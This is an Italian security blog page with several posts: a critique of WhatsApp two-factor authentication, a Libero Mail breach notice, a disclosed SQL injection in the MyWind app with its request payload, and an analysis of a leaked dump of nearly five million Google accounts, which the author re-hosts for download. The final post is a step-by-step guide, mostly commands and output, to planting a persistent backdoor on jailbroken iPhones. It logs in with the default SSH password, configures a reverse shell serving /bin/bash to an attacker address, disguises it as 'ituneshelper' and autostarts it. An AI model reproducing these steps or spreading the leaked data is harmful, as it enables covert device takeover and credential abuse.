Articoli

WhatsApp: La peggior autenticazione a due fattori che abbia mai visto!

Un’autenticazione a due fattori (o autenticazione a più fattori o strong authentication) è un metodo di autenticazione che si basa sull’utilizzo congiunto di due metodi di autenticazione individuale. {Wikipedia}

Ieri da un ReTweet di Federico Maggi ho appreso che WhatsApp aveva reso disponibile a tutti, e non solo ad un riestretto numero di utenti come avveniva dallo scorso novembre, l’autenticazione a due fattori. Questo ulteriore strato di protezione garantisce all’utente una maggior sicurezza e l’impossibilità di usare le vulnerabilità del protocollo telefonico SS7 per impossessarsi di un account WhatsApp altrui.

Il 2FA (two factor authentication) viene usualmente implementato mediante i seguente tre metodi:

  • pin/password (codice statico);
  • token/otp (password generata casualmente a cadenza temporale);
  • biometria (impronta digitale, iride, ecc).

WhatsApp ha scelto il primo metodo per implementare l’autenticazione a due fattori, probabilmente perché già il primo metodo è basato sull’autenticazione tramite One Time Password attraverso l’invio di un SMS al nuovo utente.

Sostanzialmente se un utente con 2FA cambia Smartphone dovrà inizialmente digitare il suo numero di cellulare, riceverà il primo codice OTP via SMS e successivamente digiterà la password del 2FA scelta in precedenza.

Comunemente il 2FA implementato tramite codice è una protezione “sconnessa” richiesta solo in una determinata azione, in questo caso l’autorizzazione ad abilitare un nuovo device. Non deve essere richiesta periodicamente altrimenti aumenta sensibilmente il rischio che tale codice possa essere esposto e quindi compromesso!

WhatsApp, come vedete nello screenshot di apertura, ha invece deciso di richiedere saltuariamente (al secondo giorno me l’ha già chiesto 2 volte) tale codice con l’intento di non farlo scordare all’utente. Oltretutto se veramente l’utente si scorda il codice e sta attivando un nuovo dispositivi è possibile effettuare l’attivazione via eMail!

Se state scuotendo la testa non avete visto ancora nulla, veramente!

Abbiamo finora capito che in linea teorica un codice statico sfruttato per il 2FA NON dovrebbe essere conservato digitalmente, ne portato appresso e generato casualmente come a rigor di logica dovrebbero essere tutti i codici/password. WhatsApp invece ti impone di ricordartelo spingendo l’utente ad usare un codice comune (una data di nascita, anniversario, ecc) o a memorizzarlo in qualche luogo facilmente raggiungibile (PostIt, Agenda, 1Password, ecc ecc) aumentando il rischio di esporre il codice.

Vi basta pensare che altri portali che sfruttano l’autenticazione a due fattori o magari anche tre richiedono di STAMPARE il codice e di conservarlo in un luogo sicuro come una CASSAFORTE. E ovviamente non ti chiedono di andare ad aprire la cassaforte tutti i giorni 🙂

Un esempio? Blockchain o 1Password!

Ma cosa succede se l’utente si scorda il codice della 2FA? Semplice basta cliccare su “Codice di accesso dimenticato” e per magia l’autenticazione a due fattori viene DISABILITATA! ?

Basito, e ovviamente non si riceve neanche un avviso via eMail di tale disabilitazione!

Proseguendo l’analisi una volta attivata la Verifica a due fattori (o in due passaggi) è possibile disattivarla dalle impostazioni, l’applicazione NON richiede il codice precedentemente impostato per procedere alla disattivazione. E ovviamente non invia una notifica all’eMail indicata durante l’attivazione.

Ricapitolando:

  • WhatsApp richiede all’utente di inserire saltuariamente (probabilmente ogni giorno) il codice del 2FA quando la best-practice prevede di richiederlo solo all’attivazione di un nuovo device;
  • Se l’utente si scorda il codice della verifica in due passaggi (sul device già attivo) con un semplice click viene disabilitato l’ulteriore livello di sicurezza;
  • L’utente o un malintenzionato possono disabilitare la verifica in due passaggi senza che venga richiesto il codice originario.

Concludo lasciandovi uno screenshot postato su Twitter da Konrad Iturbe in cui si evince che il codice del 2FA viene conservato e salvato in chiaro (deducibile dalla brevità del campo). Preciso che non ho verificato quest’ultima notizia.

/3 Commenti/da

Libero Mail: Violato il Database degli utenti!

Libero Mail

In passato ho parlato abbondantemente di diverse anomalie nella WebMail di Libero (qui per gli articoli passati) ma non era mai arrivata l’ufficialità da parte di ItaliaOnline delle mie supposizioni e neanche alcuna risposta alle domande che gli avevo posto.

In nottata è finalmente arrivata la conferma di quello che da sempre pensavo. Libero Mail ha subito un attacco e il suo Database è stato compromesso.

Ecco il comunicato:

Gentile Cliente,
come sai l’efficacia della password è fondamentale per la sicurezza della tua casella di posta. Per questo Libero ti raccomanda di modificarla frequentemente, seguendo i suggerimenti forniti nella sezione dedicata di Libero Aiuto.

Libero Mail è inoltre l’unico servizio di posta in Italia che ti consente di elevare la sicurezza della tua casella utilizzando il servizio Password Sicura, che protegge il tuo account attraverso un doppio controllo: la password della tua casella di posta e un codice di verifica sul tuo telefono. Puoi trovare tutti i dettagli a questo link.

Ti informiamo che il sistema di sicurezza di Libero ha rilevato nei giorni scorsi un attacco informatico alla propria rete, con accesso al database che custodisce, in formato criptato, le password dei servizi. Ci teniamo a farti sapere che sono state messe in atto tutte le misure tecniche atte a contrastare l’attacco, non appena ne è stata rilevata la presenza.

Inoltre, la memorizzazione delle password nel database di Libero avviene appunto in forma criptata, secondo gli standard di sicurezza più avanzati.
Per proteggere ulteriormente il tuo account, ti chiediamo di reimpostare comunque la password di accesso, tenendo conto dei suggerimenti forniti sul sito di Aiuto. Sappiamo che modificare la password può creare disagio, ma si tratta di una misura precauzionale supplementare, per garantire una ulteriore barriera di protezione.

Ti ricordiamo inoltre di aggiornare con la nuova password anche la app Libero Mail e le applicazioni di posta su pc (es Outlook, Thunderbird, ecc.).

Per ogni richiesta di chiarimenti puoi contattare il Servizio Clienti di Libero, accedendo alle pagine del sito di Libero Aiuto.

Lo Staff di Libero

 

Due giorni fa abbiamo appreso che la WebMail Russa Rambler.ru è stata violata e conservava le password degli utenti in plaintext, priva quindi di qualsiasi sistema di criptazione.

Con la speranza che Libero sfrutti un valido sistema di criptazione per conservare le password degli utenti, invito i lettori a cambiare la propria password. E ricordatevi di utilizzare una password diversa per ogni servizio.

Se vi saranno ulteriori dettagli vi terrò aggiornati.

/10 Commenti/da

Dirigente sanitario scorda le password e manda in blocco il sistema ospedaliero, ridendo! :(

Password_Monkey

Lo scorso 24 Febbraio mentre mi dirigevo al lavoro e ascoltavo come tutte le mattine Il Ruggito del Coniglio su Radio 2, un contributo telefonico mi ha veramente scioccato dall’ingenuità di un Dirigente Sanitario nel confessare di aver mandato in stallo l’intero sistema informatico dell’ospedale a causa della dimenticanza delle password e il continuo tentativo di inserire le credenziali corrette. Ma ancora più sconvolgente è la sua ammissione di aver bloccato non solo le operazione di routine ma anche le sale operatorie, il tutto ridendo al telefono con i conduttori radiofonici.

Le generalità del dirigente ospedaliero non le conosciamo, se non il suo nome Paolo e la provenienza Caserta forniti da uno dei due conduttori, potete riascoltare l’intervento del signore tramite i Podcast al minuto 25:50. Testualmente questo è quanto è stato detto da Paolo:

Dopo ferie estive scorse ad agosto, io sono un dirigente ospedaliero, ho cercato di recuperare le password di accesso a tutto il sistema che dirigeva le cose fra cui le prenotazione, le sale operatorie..alla fine niente ho bloccato tutto il sistema, ho bloccato tutto l’ospedale. Niente da fare, perché sono entrato con altre password e mi ha bloccato tutto…tutto! Ahahahahah interventi operatori rimandati, alla fine ho dovuto chiamare il tecnico da Roma per farmi sbloccare tutto.

Lascio a voi ogni conclusione, ho voluto riportare il fatto perché lo ritengo grave. Probabilmente sono state messe a rischio delle vite umane visto il blocco degli interventi, ma anche per la sfacciataggine e ingenuità di questo Paolo di andare in radio a raccontare il fatto. Spero sia stato uno scherzo radiofonico, spero!

/2 Commenti/da

MyWind & SQL Injection – A rischio le credenziali degli utenti!

MyWind_App

Lo scorso 4 Gennaio sul sito degli Autistici il ricercatore di Sicurezza Informatica Giulio ha rilevato come l’applicazione MyWind dell’omonimo operatore di telefonia mobile sia vulnerabile ad un attacco di tipo SQL Injection. L’applicazione permette agli utenti Wind/Infostrada di vedere il proprio credito residuo, contatori, promozioni attive, visualizzare il PUK e diverse altre opzioni.

Giulio, il ricercatore, ha rilevato una vulnerabilità di tipo SQL Injection nel form per il recupero della password, nel caso un cliente l’avesse smarrita. Dato l’ambiente e il form risultato vulnerabile è facilmente deducibile che è possibile ricavare dal database informazioni confidenziali come eMail, username, password e magari anche i numeri di cellulare degli utenti se non addirittura il traffico telefonico generato.

La Full Disclosure integrale è disponibile sul sito degli Autistici dove vengono mostrati i Request e Response a dimostrazione della vulnerabilità individuata.

Il parametro vulnerabile è il numero di cellulare dell’utente, inviato tramite metodo POST ai server della Wind. Nell’esempio sottostante viene utilizzato il numero fittizio 340123456 e viene iniettato il classico and 1=1:

parameters=["340123456' and 1=1"]&adapter=MASPAdapter&__wl_deviceCtx=<stripped>&procedure=startRecuperoCredenzialiMobile&compressResponse=false&isAjaxRequest=true&x=0.6955877927697153

La risposta alla precedente richiesta dovrebbe essere negativa, avendo iniettato codice a nostro piacimento, ma con grande risposta otteniamo una risposta positiva (true):

/*-secure-
{<strong>"isSuccessful":true</strong>,"response":{"reason":"Richiesta elaborata correttamente","status":"0","datetime":"20141209205546"},"session":{"id":"","expires":"600"}}*/

Come spesso accade, anche nelle vulnerabilità da me individuate, nonostante diverse segnalazioni l’applicazione risulta ancora ad oggi vulnerabile e un attaccante potrebbe sfruttare questa falla per sottrarre informazioni private o nella peggiore delle ipotesi accedere ai sistemi Wind mediante una shell caricata attraverso SQL Injection. La vulnerabilità è stata comunicata al gruppo Wind/Infostrada il 1 Dicembre 2014 e successivamente altre quattro volte senza ottenere alcuna risposta, pertanto il ricercatore ha pubblicato lo scorso 4 Gennaio la Full Disclosure.

Come sempre mi auguro in una veloce risoluzione del problema e una valutazione più approfondita degli aspetti di Sicurezza Informatica da parte delle grandi società tecnologiche.

[AGGIORNAMENTO]

Giulio vuole precisare il suo rapporto con gli Autistici:

Uso lo spazio gentilmente offerto da Autistici perché ne condivido il manifesto e le idee, tuttavia sono un utente come un altro, e non faccio parte del loro collettivo, che invece gestisce il blog cavallette.

/10 Commenti/da

[AGGIORNATO x5] Violati 5 milioni di Account Google, ecco i dettagli!

Violati 5 Milioni di Account Google

Precisamente sono 4.929.090 gli Account Google Violati resi pubblici ieri sera alle 23:38 GMT-4 attraverso un Forum Russo dedicato ai BitCoin. In una discussione è stato pubblicato un archivio contenente eMail e relavite password come potete vedere dall’immagine di apertura di quasi cinque milioni di account Google. L’archivio che a dire dell’autore è stato recentemente aggiornato e più del 60% della password risultano veritiere, glli amministratori del forum hanno prontamente rimosso le password lasciando visibili esclusivamente gli indirizzi eMail per poter eseguire dei controlli personali e capire se la propria casella è stata violata o meno. L’archivio in questione è denominato google_5000000.7z (HASH MD5: 4ef74c48d1599802f5ef32c04852e764) ed è liberamente scaribabile da tutti. Sulla rete Torrent è invece già disponibile l’archvio originale contenete anche le password, questo archivio preferisco non pubblicarlo garantendo la sicurezza dei quasi 5 milioni di utenti.

 

Schermata 2014-09-10 alle 12.59.53

Concludo lasciandovi i consigli di Google per scegliere una password robusta e nel dubbio cambiate subito la password ed abilitate la verifica in due passaggi!

Se dovessero esserci ulteriori novità vi terrò aggiornati!

[AGGIORNAMENTO]

In molti mi segnalate che il Forum Russo risulta Down e quindi non è possibile scaricare l’archivio, ho quindi pensato di renderlo disponibile da una fonte alternativa. Potete scaricare il file clicando qui google_5000000.7z!

[AGGIORNAMENTO x2 x5]

Accedendo al sito internet https://isleaked.com/en.php è possibile inserire il proprio indirizzo di gMail e scoprire se fate parte del leak in questione, se fosse presente l’indirizzo il sito vi riporterà i primi due caratteri della vostra password. Il mio consiglio è comunque quello di NON sfruttare il sito internet in questione, piuttosto scaricatevi l’archivio che ho reso disponibile anche tramite una seconda fonte. È possibile che questo servizio sia stato creato appositamente per creare un elenco di eMail che verranno sfruttate chissà come (spam, phishing, ecc ecc). Un grazie a MyWeb per aver alimentato un po’ di sana paranoia 🙂

[AGGIORNAMENTO x3]

Nell’archivio pubblico o comunque in quello contenenete le password non sono presenti esclusivamenti indirizzi di posta elettronica @gmail.com ma son presenti anche 123224 eMail con estensione @yandex.ru che provengono sicuramente dal leak del 8 Settembre scorso, ma andiamo per ordine così posso mostrarvi dalla mia piccola analisi cosa ho rilevato:

drego85$ wc -l google_5000000.txt
4929090 google_5000000.txt

Il file come vi anticipavo dovrebbe contenere 4.929.090 eMail di Google ma successivamente decido di eliminare dall’elenco le porzioni di test non valide, prelevando esclusivamente le eMail

drego85$ fgrep @ google_5000000.txt -c
4927698

scopro conseguentemente che le eMail valide solo realmente 4.927.698 e me le salvo all’interno del file google_5000000_validemail.txt, proseguendo:

drego85$ grep @yandex.ru google_5000000_validemail.txt -c
123224

di esse però vi sono 123.224 eMail di @yandex.ru, le rimanenti eMail saranno tutte di Google?

 drego85$ sed -n -e ‘s:.*@::p’ google_5000000_validemail.txt | sort | uniq -c | sort -n -r
sed: RE error: illegal byte sequence
4723698 gmail.com
123224 yandex.ru
600 gmail.com777
335 gmail.com.vn
254 gmail.com.br
234 gmail.com.au
187 gmail.com7777
171 gmail.com.com
120 gmail.com.
95 gmail.comm
89 gmail.com_abuse
68 gmail.com|login
59 gmail.com
47 gmail.com.pl
44 gmail.com777777
43 gmail.comn
43 gmail.com77777
38 gmail.coml
37 gmail.com.ar
33 gmail.com.mm
31 gmail.com\r\n
29 gmail.com.my
27 gmail.com.sg
25 gmail.comq
24 gmail.coma
23 gmail.come
23 gmail.com.tw
23 gmail.com.mx
22 hotmail.com
21 gmail.com_xtube
19 yahoo.com
19 gmail.como
18 gmail.com.il
16 gmail.com`
16 gmail.com.in
15 gmail.com|googlemail}.com
15 gmail.comi
15 gmail.com,
15 gmail.com%
12 gmail.com1
11 gmail.comt
11 gmail.coms
11 gmail.comr
11 gmail.comj
11 gmail.com777777777
10 gmail.comk
10 gmail.com.tr
10 gmail.com.ph
10 gmail.com.hk

Bene scopriamo quindi che il file non è ancora perfettamente formattato, ma tralasciando questo dettaglio scopriamo che nell’archvio vi sono realmente 123224 di @yandex.ru e 22 eMail di @hotmail.com con le relative password. Ma mi balza all’occhio l’estensione _xtube che appartire a 21 account eMail quasi come se il creatore dell’archivio avesse voluto specificare la fonte degli indirizzi eMail in questione. XTube fa parte di una delle più grandi società di Pornografia online, detiene infatti la proprietà di YouPorn, ed è proprio YouPorn ad essere stato vittima di un attacco nel 2012 che esponeva le credenziali di accesso come vi riportai in questo articolo. Ho quindi deciso di analizzare le eMail contrassegnate con “Xtube”:

drego85$ grep @gmail.com_xtube google_5000000_validemail.txt | sort
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube
[email protected]_xtube

Gli archivi che avevo pubblicato nell’articolo sull’attacco a YouPorn purtroppo non sono più accessibili, ma cercando su internet ed usando l’archivio di Dazzlepod scopro che solo [email protected] appartiene al portale XTube ma non fa parte del Leak pubblicato nel 2012.

Onestamente speravo di aver trovato la fonte, o almeno parziale, di questo mega archivio di indirizzi Gmail e relative password…ma ho sbagliato strada! Scorro l’elenco manualmente e scopro che diverse email vengono espresse nel seguente formato: [email protected]. Un formato assolutamente anomalo perchè il carattere “+” viene spesso ignorato oppure usato per creare filtri personalizzati.

Allora analizzo meglio i risultati e tento di capire se dall’espressione “+sitointernet.estensione” posso ottenere qualche dettaglio in più, tramite il comando sed ottengo l’elenco dei nomi maggiornmente usati successivamente al + e antecedenti a @gmail.com. Poi inizio a contarli:

drego85$ grep +daz google_5000000_validemail.txt -c
213

drego85$ grep +xtube google_5000000_validemail.txt -c
196

drego85$ grep +savage google_5000000_validemail.txt -c
117

grep +filedropper google_5000000_validemail.txt -c
90

grep +daz3d google_5000000_validemail.txt -c
69

drego85$ grep +eharmony google_5000000_validemail.txt -c
65

Quindi è possibile, ma ovviamente non posso esserne sicuro, che tali eMail e relative password siano state sottratte dai siti in qestione (Daz, xTube, Filedropper, ecc) e memorizzate con la dicitura “+sito.estesione” per ricordarsi la fonte.

Concludo questo sito articolo confermando che a mio giudizio le password sono state sottratte tramite attacchi di Phishing oppure attraverso SQL Injection su siti non appartenenti a Gmail e quindi l’abitudine frequente di usare sempre una stessa password permette di accedere comunque all’indirizzo di posta elettronica fornito da Google.

[AGGIORNAMENTO x4]

Un’analisi similare alla mia che mostra altri aspetti e punti di vista l’ha condotta Diego Elio Pettenò in Inglese, vi invito a leggerla perchè è interessante.

For English readers, Diego Elio Petternò wrote in English an analysis similar to mine. Here you can read, it is interesting!

/36 Commenti/da

Hash Identifier – Identifica il tipo di Hash di una password

Hash Identifer

Hash Identifier è un software nato nel 2011 e scritto in Python realizzato per identificare moltissimi tipi di hash tra i quali (ma non solo):

  • CRC-32
  • CRC-32B
  • CRC-16
  • CRC-16-CCITT
  • DES(Unix)
  • FCS-16
  • GHash-32-3
  • GHash-32-5
  • GOST R 34.11-94
  • Haval-160
  • Haval-192 110080 ,Haval-224 114080 ,Haval-256
  • Lineage II C4
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(WordPress)
  • MD5(APR)
  • Haval-128
  • MD2
  • MD4
  • MD5
  • MD5(HMAC(WordPress))
  • NTLM
  • RAdmin v2.x
  • RipeMD-128
  • SNEFRU-128
  • Tiger-128
  • MySQL5 – SHA-1(SHA-1($pass))
  • MySQL 160bit – SHA-1(SHA-1($pass))
  • RipeMD-160
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) – Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) – Joomla
  • SAM – (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool

Per chi fosse interessato a provare il programma può scaricarlo attraverso il sito ufficiale di Google Code.

Via | DarkNet

/0 Commenti/da

SocialMedia WordList Italiano: Politica, Musica, Farma, Televisione

Password_List

Matteo Flora ha voluto recentemente condividere sulla lista di distribuzione Sikurezza.org un estratto di parole chiavi italiane utilizzate nei principali Social Network, tali parole possono essere sfruttate per creare un’ottima wordlist.

Le parole sono rappresentate in quattro liste dedicate alla  Politica (estratto dall’analisi delle Politiche 2013 con 1.1M tweet), SocialTV (750k tweet di televisione), Farma (96k tweet), Sanremo (650k tweet del Festival).

È possibile effettuare il download delle liste su GitHub, la licenza è Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.

Per qualsiasi informazione o contributo ulteriore potete contattare direttamente Matteo tramite il suo personale sito internet.

/0 Commenti/da

Creiamo una Backdoor permanente su iOS

Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.

Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.

In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.

L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.

Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...

Scarichiamo ed estraiamo la Backdoor

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093 66.3K/s in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h

Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
* reconnect every 10 seconds.
*/

#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"

Compiliamo SBD

<pre>iphone4:~/sbd-1.36 root# make
usage:
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*

Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons

iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.ituneshelper.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/ituneshelper</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
EOF

iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC

[email protected]:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

[email protected]:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e  
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

[email protected]:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
